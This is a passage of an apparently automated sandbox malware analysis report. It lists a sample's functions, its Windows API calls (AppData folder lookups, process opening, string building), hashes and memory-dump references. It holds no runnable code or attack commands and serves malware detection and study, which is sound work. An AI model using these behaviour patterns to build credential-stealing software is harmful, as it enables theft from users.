                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit$__getptd
                          • String ID: XuT$XuT
                          • API String ID: 441000147-1755042536
                          • Opcode ID: 78f32d62c93e2e3633179e3e6ec4283dfcef306fbc5ac4f811efc05745cb7d50
                          • Instruction ID: 1f47710a836f3b120563a1c3026d2e2477b1f3b6b9dc0507ec40fac9d2127104
                          • Opcode Fuzzy Hash: 78f32d62c93e2e3633179e3e6ec4283dfcef306fbc5ac4f811efc05745cb7d50
                          • Instruction Fuzzy Hash: 8301D2BAD06F1ABBCB20AB2C94097DEBFA0BF59B14F150404F41067680CBA06C41DBE6
                          Function 00518710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00518737
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A188
                            • Part of subcall function 0053A173: std::exception::exception.LIBCMT ref: 0053A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 8fbf071053495814d43b459ad1bcbfd3f8ac737a14d25c2b76058c7af2e642c3
                          • Instruction ID: f993f60814f77534985645a7e954b750d383b7e475820837eca04accd169e6aa
                          • Opcode Fuzzy Hash: 8fbf071053495814d43b459ad1bcbfd3f8ac737a14d25c2b76058c7af2e642c3
                          • Instruction Fuzzy Hash: B5F06237B000221B9324643E8D854AEAD46A7E5390339D625E855DF299DC72DCC285D4
                          Function 005386D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0053781C: __mtinitlocknum.LIBCMT ref: 00537832
                            • Part of subcall function 0053781C: __amsg_exit.LIBCMT ref: 0053783E
                          • ___addlocaleref.LIBCMT ref: 00538756
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL$XuT$xtT
                          • API String ID: 3105635775-533903547
                          • Opcode ID: 7c9460d8cf6467967a95e7e8e37c44fc39372bc9a6437cdb4d62b1944e2d53e4
                          • Instruction ID: d58875cb90fcf884d103f505d54dffecfb9b454eb1426342d74ffb789ba79a78
                          • Opcode Fuzzy Hash: 7c9460d8cf6467967a95e7e8e37c44fc39372bc9a6437cdb4d62b1944e2d53e4
                          • Instruction Fuzzy Hash: 56016171845B05DAD720AF79980E79AFFE0BF95314F20890DA4D5676A1CBB0AA44CB50
                          Function 0052E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0052E544
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E573
                          • lstrcat.KERNEL32(?,00000000), ref: 0052E581
                          • lstrcat.KERNEL32(?,011AD248), ref: 0052E59C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: ac3daa3d087714c413470d1d4e701a178d7041093c4ad86b66a24d7d5eecb533
                          • Instruction ID: 0d69188803c401ea2cb864d10160f4706ff95bb77609f93e5b21f332b62469bd
                          • Opcode Fuzzy Hash: ac3daa3d087714c413470d1d4e701a178d7041093c4ad86b66a24d7d5eecb533
                          • Instruction Fuzzy Hash: C551C6B5A1011DAFD754EB64EC46EEE3B79FF89300F004499BA0697241DB709E808FA5
                          Function 00531FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00531FDF, 00531FF5, 005320B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: strlen
                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 39653677-4138519520
                          • Opcode ID: 85677080a3ff36f01ee90d1b02337967487d1d4567b42e048ff5587d5ba8283a
                          • Instruction ID: f09104ba7747f427150ade1e4cc2fea0fd2470baffab9a1606b02d7a961823f7
                          • Opcode Fuzzy Hash: 85677080a3ff36f01ee90d1b02337967487d1d4567b42e048ff5587d5ba8283a
                          • Instruction Fuzzy Hash: 9D2137395105899EDB28EA36C44C7DDFB66FF80365F848456C8194B381E336190EDB96
                          Function 0052EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0052EBB4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052EBE3
                          • lstrcat.KERNEL32(?,00000000), ref: 0052EBF1
                          • lstrcat.KERNEL32(?,011ADD20), ref: 0052EC0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 48199b9585a4a8dc2d33ffb1db226827a7217b248cb9d8882e1bf010af498f6f
                          • Instruction ID: 6f1d2cd51906269c592c5f4e5e0b5113b623ff17c45c319e14acdbe445852c9a
                          • Opcode Fuzzy Hash: 48199b9585a4a8dc2d33ffb1db226827a7217b248cb9d8882e1bf010af498f6f
                          • Instruction Fuzzy Hash: 5231D97195011D9BDB21EF64EC46BEE7BB5BF89300F0044A5B60697290DF709EC48F94
                          Function 00534480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000), ref: 00534492
                          • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 005344AD
                          • CloseHandle.KERNEL32(00000000), ref: 005344B4
                          • lstrcpy.KERNEL32(00000000,?), ref: 005344E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                          • String ID:
                          • API String ID: 4028989146-0
                          • Opcode ID: 89cca49b664edda8b8c631544b1b6cca4d430c7a61b34870bc36ddfee712eafd
                          • Instruction ID: d55635fe1d59254bae61d35043f87b6dd3267cdbcbc325fb36f3a273f3ed2c9f
                          • Opcode Fuzzy Hash: 89cca49b664edda8b8c631544b1b6cca4d430c7a61b34870bc36ddfee712eafd
                          • Instruction Fuzzy Hash: FCF0FCB49016152BFB209B749C4DBEA7FA8FF15704F0445A1FB85D7180DBB49CC48B94
                          Function 00538FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 00538FDD
                            • Part of subcall function 005387FF: __amsg_exit.LIBCMT ref: 0053880F
                          • __getptd.LIBCMT ref: 00538FF4
                          • __amsg_exit.LIBCMT ref: 00539002
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00539026
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 05d7c0d42690101b552edd1e2ea69b54316ab7153ff962900be40c76e54b0942
                          • Instruction ID: 4b4f4fd047a0fc7ff7b456727b089e571436f734c51e6590c7c942cb168e45fe
                          • Opcode Fuzzy Hash: 05d7c0d42690101b552edd1e2ea69b54316ab7153ff962900be40c76e54b0942
                          • Instruction Fuzzy Hash: 5CF059B2D087158BDB38BB78980F7AD7FA1BF44720F244508F000AB2D2DFB41901EA65
                          Function 00537310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(------,00515BEB), ref: 0053731B
                          • lstrcpy.KERNEL32(00000000), ref: 0053733F
                          • lstrcat.KERNEL32(?,------), ref: 00537349
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrcpylstrlen
                          • String ID: ------
                          • API String ID: 3050337572-882505780
                          • Opcode ID: b3778380a05b7b7e92e8ef46db33a1cd0bacf4e929ade93ac0f48378d0dfa5fa
                          • Instruction ID: 7b1009b2b760c0ce614f8464aab7071d216d93a171f93065ab20287a75090831
                          • Opcode Fuzzy Hash: b3778380a05b7b7e92e8ef46db33a1cd0bacf4e929ade93ac0f48378d0dfa5fa
                          • Instruction Fuzzy Hash: 2BF0C0B8911706DFDB649F75D84892BBBF9FF85701718881DA89AC7214E734D850CB10
                          Function 005233D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511557
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511579
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 0051159B
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 005115FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00523422
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052344B
                          • lstrcpy.KERNEL32(00000000,?), ref: 00523471
                          • lstrcpy.KERNEL32(00000000,?), ref: 00523497
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: b1feeec2c6772b29f9030e26cb666e197a7aeff2287dcbc7fc768e894543669a
                          • Instruction ID: d611749910049658108b38fb870b6609934328f8a999c59a56d8b093d8c41eed
                          • Opcode Fuzzy Hash: b1feeec2c6772b29f9030e26cb666e197a7aeff2287dcbc7fc768e894543669a
                          • Instruction Fuzzy Hash: 76120D74A012218FDB28CF19D558B25BBE5BF46714B1DC0AEE8098B3E1D77AED42CB40
                          Function 00527C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00527C94
                          • std::_Xinvalid_argument.LIBCPMT ref: 00527CAF
                            • Part of subcall function 00527D40: std::_Xinvalid_argument.LIBCPMT ref: 00527D58
                            • Part of subcall function 00527D40: std::_Xinvalid_argument.LIBCPMT ref: 00527D76
                            • Part of subcall function 00527D40: std::_Xinvalid_argument.LIBCPMT ref: 00527D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
